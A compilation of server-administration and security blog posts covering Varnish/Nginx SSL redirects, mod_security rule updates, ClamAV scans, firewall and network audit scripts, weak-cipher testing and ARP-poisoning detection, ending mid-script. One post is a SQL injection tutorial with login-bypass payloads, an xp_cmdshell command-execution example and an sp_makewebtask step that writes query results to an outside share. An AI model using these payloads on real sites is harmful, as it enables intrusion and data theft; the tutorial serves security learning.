Force SSL for your site with Varnish and Nginx

Hello!

For those of you who depend on Varnish for robust caching and scaling potential in your web stack, hearing about Google’s ranking prioritization (albeit arguably small, for now) of sites that force SSL may give you pause: how do you implement it?

Varnish currently can’t terminate SSL or encrypt and decrypt requests itself. It may never gain this ability, because its focus is caching content, and it does a very good job of that, I might add.

So if Varnish can’t handle the SSL traffic directly, how would you go about implementing this with Nginx?

Well, Nginx has the ability to proxy traffic, which is one of the many reasons some admins choose to pair Varnish with Nginx. Nginx can do reverse proxying and header manipulation out of the box, without custom modules or configuration. Combine that with Nginx’s lightweight, production-tested scalability compared to Apache and the reasons are simple. We’re not interested in that debate here, just a simple implementation.

Nginx Configuration

With Nginx, you will need to add an SSL listener to handle the HTTPS traffic and assign your certificate to it. The actual traffic is then proxied to the (already set up) non-HTTPS listener (Varnish).

server {
        listen x.x.x.x:443 ssl;

        server_name yoursite.com www.yoursite.com;
        ssl_certificate /etc/nginx/ssl/yoursite.com.crt;
        ssl_certificate_key /etc/nginx/ssl/yoursite.com.key;
        ssl_protocols       TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers         HIGH:!aNULL:!MD5;

        if ($host !~* ^www\.) {
                rewrite ^(.*)$ https://www.$host$1 permanent;
        }

        location / {
            # Pass the request on to Varnish.
            proxy_pass  http://127.0.0.1:80;

            # Pass some headers to the downstream server, so it can identify the host.
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            # Tell any web apps like Drupal that the session is HTTPS.
            proxy_set_header X-Forwarded-Proto https;

            proxy_redirect     off;
        }
}

The one thing to note before going further is the X-Forwarded-Proto header set near the end of the location block. It is important because it lets you avoid an infinite redirect loop: the request is proxied to Varnish, Varnish redirects non-SSL to SSL, and the request lands right back at Nginx to be proxied again. You’ll notice that pretty quickly because your site will ultimately go down 🙁

What nginx is doing is defining a custom HTTP header and assigning a value of “https” to it :

proxy_set_header X-Forwarded-Proto https;

The rest of the Nginx configuration (the backend configuration that Varnish ultimately forwards requests to in order to cache) can remain the same.

Varnish

What you’re going to need in your Varnish configuration is a minor adjustment, in the vcl_recv subroutine :

if (req.http.X-Forwarded-Proto !~ "(?i)https") {
    set req.http.x-Redir-Url = "https://www.yoursite.com" + req.url;
    error 750 req.http.x-Redir-Url;
}

What the above snippet does is check whether the header “X-Forwarded-Proto” (which Nginx just set) exists and whether its value equals “https” (case insensitive). If it is not present or does not match, Varnish sets a redirect to force the SSL connection, which is then handled by the Nginx SSL proxy configuration above. It’s also important to note that we are not just doing a clean-break redirect; we append the originating request URI so the transition is smooth and previously ranked links/URLs don’t break.

The last thing to note is the error 750 handler that handles the redirect in varnish :

sub vcl_error {
    if (obj.status == 750) {
        set obj.http.Location = obj.response;
        set obj.status = 302;
        return(deliver);
    }
}

You can see that we’re using a 302 temporary redirect instead of a permanent 301 redirect. That is your decision to make, though browsers tend to be stubborn about their own internal caching of 301 redirects, so a 302 is good for testing.

After restarting varnish and nginx you should be able to quickly confirm that no non-SSL traffic is allowed anymore. You can not only enjoy the (marginal) SEO “bump” but you are also contributing to the HTTPS Everywhere movement which is an important cause!
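A quick way to confirm this from the command line (using the www.yoursite.com name from the examples above; -k just skips certificate validation while testing) :

curl -sI http://www.yoursite.com/ | grep -Ei '^(HTTP|Location)'
curl -skI https://www.yoursite.com/ | head -n 1

The first request should come back as a single 302 with an https Location header from Varnish, and the second should return a 200 straight from the Nginx SSL listener, with no redirect loop in between.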

Auto updating Atomicorp Mod Security Rules

Hello!

If any of you use mod_security as a web application firewall, you might have enlisted the services of Atomicorp for regularly updating your mod_security ruleset with signatures to protect against constantly changing threats to web applications in general.

One of the initial challenges, in a managed hosting environment, was to implement a system that utilizes the Atomicorp mod_security rules and update them regularly on an automated schedule.

When you subscribe to their service, they provide access credentials in order to pull the rules. You then need to integrate the rule files into your mod_security implementation and gracefully restart apache or nginx to ensure all the updated rules are loaded.

We developed a very simple Python script, intended to run as a cron scheduled task, to accomplish this. We thought we would share it here in case anyone else finds it useful for the same thing. The script could easily be modified to download rules from any similar service, and although it was written for Nginx, it can be adapted for Apache.

Find the code below. Enjoy!

#!/usr/bin/python
import urllib2, tarfile, os, time

username = 'yourusername'
password = 'yourpassword'
# create a password manager
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
top_level_url = "http://updates.atomicorp.com/channels/rules/subscription/"
password_mgr.add_password(None, top_level_url, username, password)
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
#data = urllib2.urlopen('http://updates.atomicorp.com/channels/rules/subscription/VERSION')

# Parse the VERSION file to find the current mod_security ruleset version
for line in urllib2.urlopen('http://updates.atomicorp.com/channels/rules/subscription/VERSION'):
    if 'MODSEC_VERSION' in line:
        var = line.split('=', 1)
        version = var[1].replace('\n', '')

# they throttle connection requests
time.sleep(10)

atomicdl = 'http://updates.atomicorp.com/channels/rules/subscription/modsec-' + version + '.tar.gz'
atomicfile = urllib2.urlopen(atomicdl)
output = open('/etc/nginx/modsecurity.d/modsecrules.tar.gz', 'wb')
output.write(atomicfile.read())
output.close()

tar = tarfile.open('/etc/nginx/modsecurity.d/modsecrules.tar.gz', 'r:gz')
tar.extractall('/etc/nginx/modsecurity.d/')
tar.close()

os.system("rsync -ravzp /etc/nginx/modsecurity.d/modsec/ /etc/nginx/modsecurity.d")
os.system("rm -rf /etc/nginx/modsecurity.d/modsec /etc/nginx/modsecurity.d/modsecrules.tar.gz")
os.system("sed -i '//d' /etc/nginx/modsecurity.d/*.conf")

Security Penetration Testing Series : SQL Injection

I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.

There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.

One such tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”
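As a quick illustration (using the sample URL from later in this post; exact flags vary a little between sqlmap versions), pointing sqlmap at a query-string parameter and asking it to enumerate databases looks something like :

sqlmap -u "http://whatever.com/index.asp?id=10" --dbs --batch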

This article does not introduce anything new, SQL injection has been widely written and used in the wild. I thought I’d write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.

What is SQL injection anyway?

It is a trick to inject a SQL query/command as input, typically via web pages. Many web pages take parameters from the user and build a SQL query to the database from them. Take, for instance, a user login: the web page takes the user name and password and makes a SQL query to the database to check whether that user name and password are valid. With SQL injection, it is possible to send a crafted user name and/or password that changes the SQL query and grants us something else.

What do you need?

Technically all you need is a web browser.

What should I look for?

Web forms. Any input area of a website that interacts with their database backend. Could be a login form, search form or anything like that.

You could also look for pages that actually have querystrings in the URL such as :

http://whatever.com/index.asp?id=10

Testing if it’s vulnerable

With those query string URLs or web forms, you can do a simple test to see if the site is vulnerable to injection. Start with the “single quote trick”, something like this :

hi' or 1=1--

For example :

http://whatever.com/index.asp?id=hi' or 1=1--

If you do that in a login form, for example, and it works, you will be logged in without needing a valid password.

Why ‘ or 1=1--?

Let us look at another example of why ‘ or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:

http://whatever.com/index.asp?category=food

In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:

http://whatever.com/index.asp?category=food' or 1=1--

Now our variable v_cat equals “food' or 1=1-- ”. If we substitute this into the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table, regardless of whether PCategory is equal to ‘food’ or not. The double dash “--” tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote (‘). Sometimes it may be possible to replace the double dash with a single hash “#”.

However, if the backend is not MS SQL Server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a 

Remote execution with SQL injection

Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (“) if single quote (‘) is not working.

The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether any ping requests arrive from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

Getting the output of my SQL query

It is possible to use sp_makewebtask to write your query output into an HTML file:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target host must have a folder named “share” shared with write access for Everyone.

Hope this helps!

Scheduled antivirus scans to prevent viral injections on user generated content

When dealing with high traffic sites, especially media based or community based sites, there is always the risk of javascript, virus, XSS or other malicious injection of badness when giving a community of users the ability to upload files to your site.

There are several things to consider when evaluating all “points of entry” that are available to the public, into your systems.

Most content management and community based systems use libraries such as Imagemagick to process images (such as profile pictures) into their proper format and size.

Believe it or not, it is hard to actually inject code or other malicious data into the image itself and have it survive this sanitizing process. There are still risks, however: the library version you are running may itself be vulnerable to exploits.

As always, a good rule of thumb is to ensure all possible aspects of your systems are up to date and that you are aware of any security vulnerabilities as they come out so they can either be patched or addressed in some other way.

One thing to consider, especially when dealing with thousands of users and even more uploads is a scheduled scan of your user uploads using free virus scanning tools such as clamscan. This is an endpoint reporting strategy that can at least cover your ass in the event that something else was missed or a 0day vulnerability exploited.

It should be noted that the virus scans themselves aren’t intended to protect the linux systems themselves, but rather the opportunistic ‘spreading’ of compromised images and code that having an infected file on a public community based system can provide.

It’s very simple to implement ClamAV (daemonization is not necessary); clamscan is all we need to execute regular scans at 10, 15, 30 or 60 minute intervals.

Once clamscan is installed, definitions updated (and regular freshclam update cronjobs in place), you can roll out a script similar to the one we have here to implement the scheduled scans :

#!/bin/bash
# Scheduled Scan of user uploaded files
# Usage : ./virusscan.sh /folder


SUBJECT="[VIRUS DETECTED] ON `hostname` !"
EMAIL="you@yourdomain.com"
LOG=/var/log/clamav/scan.log

# Clear out old logs -- the email alerts should be archived if we need to go back to old alerts
echo "" > $LOG

# Check if the folder is empty -- only scan if this is an active node in a clustered system
# look for empty dir
if [ "$(ls -A $1)" ]
then
        # Scan files 
        clamscan $1 -r --infected --scan-pdf --scan-elf --log=$LOG

        # Check the last set of results. If there are any "Infected" counts that aren't zero, we have a problem.
        cat $LOG | grep Infected | grep -v 0
        if [ $? = 0 ]
        then
                cat $LOG | mail -s "$SUBJECT" $EMAIL -- -F Antivirus -f antivirus@yourdomain.com
        fi

else
        echo "directory empty -- doing nothing"
        exit 0;
fi

The actual cronjob entry can look something like this :

0 */1 * * * /bin/bash /usr/local/bin/virusscan.sh "/your/path/to/user/uploaded/files/" > /dev/null 2>&1

It seems like a rather simple solution, but it does provide a venue for additional sanitizing of user input. In our experience, it is best to only report on anything that clamscan might find. You can, however, tell clamscan to simply delete any suspected infections it finds.
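If you do want automatic cleanup instead of report-only behaviour, clamscan can remove infected files itself. A variation on the scan line used in the script above would look something like this (use with caution, since false positives get deleted too) :

clamscan "$1" -r --infected --remove=yes --log=$LOG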

Shell Script to Report On Hacking Attempts

It is always a good idea , when implementing open source firewall implementations (iptables, pf, etc), to build in as much reporting and verbosity as possible.

Having verbose reports on the state of your firewall, intrusion attempts and other information is key to ensuring the health and integrity of your network.

Somewhere along the line, we wrote a script to provide daily reports on intrusion attempts to penetrate our network — this usually happens when someone exceeds certain connection thresholds.

It may not be the most informative data, but the script can be modified to provide other important statistical information. It can also be modified to be used with other firewall implementations. I’m certain it wouldn’t be hard to convert this script to utilise iptables.

Below you will find the script itself — it can be set to run daily as a cronjob perhaps. Also note that the script tries to resolve a hostname for the IP address to at least provide some quick & easy information to the security administrators when determining coordinated attacks or attacks coming from compromised systems.

#!/bin/bash
# SDH PFCTL Daily Hack Table check

yesterday1=`date -v -1d +"%b"`
yesterday2=`date -v -1d +"%e"`
yesterday_display=`date -v -1d +"%b %d %Y"`

echo "" > /var/log/tablecheck.log

/sbin/pfctl -vvsTables > /var/log/pfctltables.log

echo "Firewall Table Audit: " $yesterday_display >> /var/log/tablecheck.log
echo -e "----------------------------------">> /var/log/tablecheck.log
echo -e "" >> /var/log/tablecheck.log

for obj0 in $(cat /var/log/pfctltables.log | grep -- "-pa-r-" | awk -F "\t" '{printf "%s\n", $2}');
do
echo -e $obj0 "TABLE" >> /var/log/tablecheck.log
echo -e "--------------" >> /var/log/tablecheck.log

# this is because the date command outputs single digit non-aligned right, but pfctl doesnt display that way :(
if [ "$yesterday2" -le 9 ]
then
        /sbin/pfctl -t $obj0 -Tshow -vv | grep -A 4 -B 1 "$yesterday1  $yesterday2" >> /var/log/tablecheck.log 2>&1
else
        /sbin/pfctl -t $obj0 -Tshow -vv | grep -A 4 -B 1 "$yesterday1 $yesterday2" >> /var/log/tablecheck.log 2>&1
fi

if [ "$?" -eq 1 ]
then
        echo -e "No values found for yesterday" >> /var/log/tablecheck.log
        echo -e "" >> /var/log/tablecheck.log
else
        echo -e "Hostnames :" >> /var/log/tablecheck.log
        for obj1 in $(/sbin/pfctl -t $obj0 -Tshow -vv | grep -B 1 "$yesterday1 $yesterday2" | grep -v "Cleared" | grep -v "--");
        do
        iphostnm=`/usr/bin/nslookup $obj1 | grep -A1 "Non-authoritative answer" | grep "name" | awk -F "=" '{printf "%s\n", $2}'`
        if [ "$?" -eq 0 ]
        then
                echo -e "$obj1 / $iphostnm" >> /var/log/tablecheck.log
        else
                echo -e "$obj1 / No host name found" >> /var/log/tablecheck.log
        fi
        done
       echo -e "" >> /var/log/tablecheck.log
fi


done

cat /var/log/tablecheck.log | mail -s "Firewall Table Report" you@youremail.com
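To schedule it, a daily cron entry along these lines would do the job (the script path here is just an assumption; adjust it to wherever you keep the script) :

0 6 * * * /bin/sh /usr/local/bin/pf-tablecheck.sh > /dev/null 2>&1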

Enjoy!

Network Audit Bash Script Using Netbios and Nmap

Working in a large office, it is sometimes necessary to use different network audit tools in order to properly assess the integrity and security of networks.

In order to quickly audit a network, I created this script to scan selected IPs, read from a configuration file, and compile a simple report to be emailed. The script can be modified to suit your needs, such as exporting the data to a database or perhaps an HTML report for a web-based reporting site.

The script itself doesn’t do anything particularly special, however it has proven useful when you want to do a quick & dirty network audit.

There are other tools out there, such as OpenAudit, Nessus and Nmap that could do similar tasks. However, the important thing to remember here is that those tools (with the exception of open audit perhaps) can be incorporated into this script to perform regular scheduled audits.

This script could actually be updated to take advantage of nmap v5.0; the new features plus ndiff could turn it into a very powerful network analysis tool.

Hopefully some of you will find some use out of the script! Enjoy!

#!/bin/sh


# Basic Information Gathering
currentmonth=`date "+%Y-%m-%d"`

rm lindows.log

echo "Hostname Identification Audit: " $currentmonth >> lindows.log
echo -e "------------------------------------------" >> lindows.log
echo -e >> lindows.log
for obj0 in $(grep -v "^#" all_linux_windows_ips.txt);
do


# Check if windows
check=`nmap -e bge0 -p 3389 $obj0 | grep open`

if [ "$?" -eq 0 ]
        then
        windowshost=`nbtscan -v -s , $obj0 | head -n 1 | awk -F"," '{printf "%s", $2}'`
        if [ -n "${windowshost:+x}" ]
                then
                echo -e "$windowshostt: $obj0t: WINDOWS" >> lindows.log
                else
                echo -e "NETBIOS UNKOWNt: $obj0t: WINDOWS" >> lindows.log
        fi
        else
        # Check if linux or freebsd
        ssh_get=`ssh -l ims $obj0 '(uname | sed 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/' && hostname | sed 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/')'`
        if [ "$?" -eq 0 ]
                then
                uname=`echo $ssh_get | awk -F" " '{printf "%s", $1}'`
                hostname1=`echo $ssh_get | awk -F" " '{printf "%s", $2}'`
                hostname2=`echo $hostname1 | awk -F"." '{printf "%s", $1}'`
                echo -e "$hostname2t: $obj0t: $uname" >> lindows.log
                else
                echo -e "UNKNOWN ERRORt: $obj0t: PLEASE CHECK HOST" >> lindows.log
        fi
fi
done

cat lindows.log | mail -s 'Windows/FreeBSD/Linux Host Audit' your@email.com

Note that “all_linux_windows_ips.txt” is just a text file with the IP addresses of all the hosts on your network, one per line. It can be modified to simply use whole subnets to make it easier to perform the audit.
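For clarity, the script reads that file line by line and skips anything starting with #, so a hypothetical all_linux_windows_ips.txt could look like :

# office workstations
192.168.1.10
192.168.1.11
# servers
192.168.2.5
192.168.2.6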

Testing for weak SSL ciphers for security audits

During security audits, such as a PCI-DSS compliance audit, it is very commonplace to test the cipher mechanism that a website / server uses and supports to ensure that weak / outdated cipher methods are not used.

Weak ciphers allow for an increased risk in encryption compromise, man-in-the-middle attacks and other related attack vectors.

Due to historic export restrictions of high grade cryptography, legacy and new web servers are often able and configured to handle weak cryptographic options.

Even if high grade ciphers are normally used and installed, some server misconfiguration could be used to force the use of a weaker cipher to gain access to the supposed secure communication channel.

Testing SSL / TLS cipher specifications and requirements for site

The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.

Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.

Testing for weak ciphers : examples

In order to detect possible support of weak ciphers, the ports associated to SSL/TLS wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS wrapped services related to the web application. In general, a service discovery is required to identify such ports.

The nmap scanner, via the “-sV” scan option, is able to identify SSL services. Vulnerability scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).

Example 1. SSL service recognition via nmap.

[root@test]# nmap -F -sV localhost

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-27 14:41 CEST
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1205 ports scanned but not shown below are in state: closed)

PORT      STATE SERVICE         VERSION
443/tcp   open  ssl             OpenSSL
901/tcp   open  http            Samba SWAT administration server
8080/tcp  open  http            Apache httpd 2.0.54 ((Unix) mod_ssl/2.0.54 OpenSSL/0.9.7g PHP/4.3.11)
8081/tcp  open  http            Apache Tomcat/Coyote JSP engine 1.0

Nmap run completed -- 1 IP address (1 host up) scanned in 27.881 seconds
[root@test]# 
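As an aside, newer nmap releases that include the NSE scripts can also enumerate the offered ciphers directly, which makes for a quick first pass before a full vulnerability scan (availability of the script depends on your nmap version, and target.example.com is just a placeholder) :

nmap --script ssl-enum-ciphers -p 443 target.example.com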

Example 2. Identifying weak ciphers with Nessus. The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers:

 https (443/tcp)
 Description
 Here is the SSLv2 server certificate:
 Certificate:
 Data:
 Version: 3 (0x2)
 Serial Number: 1 (0x1)
 Signature Algorithm: md5WithRSAEncryption
 Issuer: C=**, ST=******, L=******, O=******, OU=******, CN=******
 Validity
 Not Before: Oct 17 07:12:16 2002 GMT
 Not After : Oct 16 07:12:16 2004 GMT
 Subject: C=**, ST=******, L=******, O=******, CN=******
 Subject Public Key Info:
 Public Key Algorithm: rsaEncryption
 RSA Public Key: (1024 bit)
 Modulus (1024 bit):
 00:98:4f:24:16:cb:0f:74:e8:9c:55:ce:62:14:4e:
 6b:84:c5:81:43:59:c1:2e:ac:ba:af:92:51:f3:0b:
 ad:e1:4b:22:ba:5a:9a:1e:0f:0b:fb:3d:5d:e6:fc:
 ef:b8:8c:dc:78:28:97:8b:f0:1f:17:9f:69:3f:0e:
 72:51:24:1b:9c:3d:85:52:1d:df:da:5a:b8:2e:d2:
 09:00:76:24:43:bc:08:67:6b:dd:6b:e9:d2:f5:67:
 e1:90:2a:b4:3b:b4:3c:b3:71:4e:88:08:74:b9:a8:
 2d:c4:8c:65:93:08:e6:2f:fd:e0:fa:dc:6d:d7:a2:
 3d:0a:75:26:cf:dc:47:74:29
 Exponent: 65537 (0x10001)
 X509v3 extensions:
 X509v3 Basic Constraints:
 CA:FALSE
 Netscape Comment:
 OpenSSL Generated Certificate
 Page 10
 Network Vulnerability Assessment Report 25.05.2005
 X509v3 Subject Key Identifier:
 10:00:38:4C:45:F0:7C:E4:C6:A7:A4:E2:C9:F0:E4:2B:A8:F9:63:A8
 X509v3 Authority Key Identifier:
 keyid:CE:E5:F9:41:7B:D9:0E:5E:5D:DF:5E:B9:F3:E6:4A:12:19:02:76:CE
 DirName:/C=**/ST=******/L=******/O=******/OU=******/CN=******
 serial:00
 Signature Algorithm: md5WithRSAEncryption
 7b:14:bd:c7:3c:0c:01:8d:69:91:95:46:5c:e6:1e:25:9b:aa:
 8b:f5:0d:de:e3:2e:82:1e:68:be:97:3b:39:4a:83:ae:fd:15:
 2e:50:c8:a7:16:6e:c9:4e:76:cc:fd:69:ae:4f:12:b8:e7:01:
 b6:58:7e:39:d1:fa:8d:49:bd:ff:6b:a8:dd:ae:83:ed:bc:b2:
 40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:34:b1:84:97:06:6f:
 f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:2d:e9:49:60:93:12:
 0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:6e:e2:fe:e5:07:81:
 82:fc
 Here is the list of available SSLv2 ciphers:
 RC4-MD5
 EXP-RC4-MD5
 RC2-CBC-MD5
 EXP-RC2-CBC-MD5
 DES-CBC-MD5
 DES-CBC3-MD5
 RC4-64-MD5

The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and 2 weak "export class" ciphers.
The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer a limited protection against a brute force attack

Solution: disable those ciphers and upgrade your client software if necessary.
See http://support.microsoft.com/default.aspx?scid=kben-us216482 or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite  This SSLv2 server also accepts SSLv3 connections. This SSLv2 server also accepts TLSv1 connections.
 
 Vulnerable hosts
 (list of vulnerable hosts follows)

Example 3. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2 (this requires an OpenSSL build that still supports SSLv2):

[root@test]# openssl s_client -no_tls1 -no_ssl3 -connect www.google.com:443
CONNECTED(00000003)
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=21:unable to verify the first certificate
verify return:1
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDYzCCAsygAwIBAgIQYFbAC3yUC8RFj9MS7lfBkzANBgkqhkiG9w0BAQQFADCB
zjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJ
Q2FwZSBUb3duMR0wGwYDVQQKExRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UE
CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAxMYVGhh
d3RlIFByZW1pdW0gU2VydmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNl
cnZlckB0aGF3dGUuY29tMB4XDTA2MDQyMTAxMDc0NVoXDTA3MDQyMTAxMDc0NVow
aDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAUBgNVBAcTDU1v
dW50YWluIFZpZXcxEzARBgNVBAoTCkdvb2dsZSBJbmMxFzAVBgNVBAMTDnd3dy5n
b29nbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/e2Vs8U33fRDk
5NNpNgkB1zKw4rqTozmfwty7eTEI8PVH1Bf6nthocQ9d9SgJAI2WOBP4grPj7MqO
dXMTFWGDfiTnwes16G7NZlyh6peT68r7ifrwSsVLisJp6pUf31M5Z3D88b+Yy4PE
D7BJaTxq6NNmP1vYUJeXsGSGrV6FUQIDAQABo4GmMIGjMB0GA1UdJQQWMBQGCCsG
AQUFBwMBBggrBgEFBQcDAjBABgNVHR8EOTA3MDWgM6Axhi9odHRwOi8vY3JsLnRo
YXd0ZS5jb20vVGhhd3RlUHJlbWl1bVNlcnZlckNBLmNybDAyBggrBgEFBQcBAQQm
MCQwIgYIKwYBBQUHMAGGFmh0dHA6Ly9vY3NwLnRoYXd0ZS5jb20wDAYDVR0TAQH/
BAIwADANBgkqhkiG9w0BAQQFAAOBgQADlTbBdVY6LD1nHWkhTadmzuWq2rWE0KO3
Ay+7EleYWPOo+EST315QLpU6pQgblgobGoI5x/fUg2U8WiYj1I1cbavhX2h1hda3
FJWnB3SiXaiuDTsGxQ267EwCVWD5bCrSWa64ilSJTgiUmzAv0a2W8YHXdG08+nYc
X/dVk5WRTw==
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
issuer=/C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/emailAddress=premium-server@thawte.com
---
No client certificate CA names sent
---
Ciphers common between both SSL endpoints:
RC4-MD5         EXP-RC4-MD5     RC2-CBC-MD5
EXP-RC2-CBC-MD5 DES-CBC-MD5     DES-CBC3-MD5
RC4-64-MD5
---
SSL handshake has read 1023 bytes and written 333 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1024 bit
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv2
    Cipher    : DES-CBC3-MD5
    Session-ID: 709F48E4D567C70A2E49886E4C697CDE
    Session-ID-ctx:
    Master-Key: 649E68F8CF936E69642286AC40A80F433602E3C36FD288C3
    Key-Arg   : E8CB6FEB9ECF3033
    Start Time: 1156977226
    Timeout   : 300 (sec)
    Verify return code: 21 (unable to verify the first certificate)
---
closed

These tests usually provide a very in-depth and reliable method for ensuring weak and vulnerable ciphers are not used in order to comply with said audits.
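If you want to spot-check individual cipher suites by hand, openssl s_client can also be driven in a small loop. Here is a rough sketch using the weak export-class suite names reported above (cipher names and support vary by OpenSSL version, and target.example.com is a placeholder) :

for c in EXP-RC4-MD5 EXP-RC2-CBC-MD5 RC4-64-MD5; do
    if echo | openssl s_client -connect target.example.com:443 -cipher "$c" 2>/dev/null | grep -q "Cipher is $c"; then
        echo "$c : accepted (weak cipher offered)"
    else
        echo "$c : rejected"
    fi
done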

Personally, I prefer the nessus audit scans. Usually the default “free” plugins are enough to complete these types of one-off audits. There are, however, commercial nessus plugins designed just for PCI-DSS compliance audits and are available for purchase from the nessus site.

Detect ARP poisoning on LAN

ARP Poisoning : Potential MITM attack

Occasionally during security audits it may be necessary to check your LAN for rogue machines. All a potential rogue machine on your LAN needs to do is poison your ARP cache so that the cache thinks the attacker is the router or the destination machine. All packets to that machine will then flow through the rogue machine, which sits, from the network’s standpoint, between the client and the server, even though physically it’s just sitting next to them. This is actually fairly simple to do, and as a result it is also fairly easy to detect.

In this sample case, the rogue machine was in a different room but still on the same subnet. Through simple ARP poisoning it convinced the router that it was our server, and convinced the server that it was the router. It then had an enjoyable time functioning as both a password sniffer and a router for unsupported protocols.

By simply pinging all the local machines (nmap -sP 192.168.1.0/24 will do this quickly) and then checking the ARP table (arp -an) for duplicate MAC addresses, you can detect ARP poisoning quite quickly.

$ arp -an| awk '{print $4}'| sort | uniq -c | grep -v ' 1 '
    5 F8:F0:11:15:34:51
   88 

Then I simply looked at the IP addresses used by that ethernet address in the ‘arp -an’ output, ignored the entries that were blatantly poisoned (such as the router), and looked up the remaining addresses in DNS to see which machine it was.
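That lookup step can be scripted as well. A rough one-liner, using the duplicated MAC address from the sample output above, would be :

arp -an | grep -i 'f8:f0:11:15:34:51' | awk '{print $2}' | tr -d '()' | while read ip; do host "$ip"; done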

Below is a script I wrote to automate this process (perhaps in a cron job) , and send out an alert email if any ARP poisoning is detected.

ARP Poisoning Check Script

This can ideally run as a cronjob (i.e. 30 * * * *)

#!/bin/sh
# Star Dot Hosting
# detect arp poisoning on LAN

currentmonth=`date "+%Y-%m-%d %H:%M:%S"`
logpath="/var/log"


rm $logpath/arpwatch.log


echo "ARP Poisoning Audit: " $currentmonth >> $logpath/arpwatch.log
echo -e "-----------------------------------------" >> $logpath/arpwatch.log
echo -e >> $logpath/arpwatch.log

arp -an | awk '{print $4}' | sort | uniq -c | grep -v ' 1 '

if [ "$?" -eq 0 ]
then
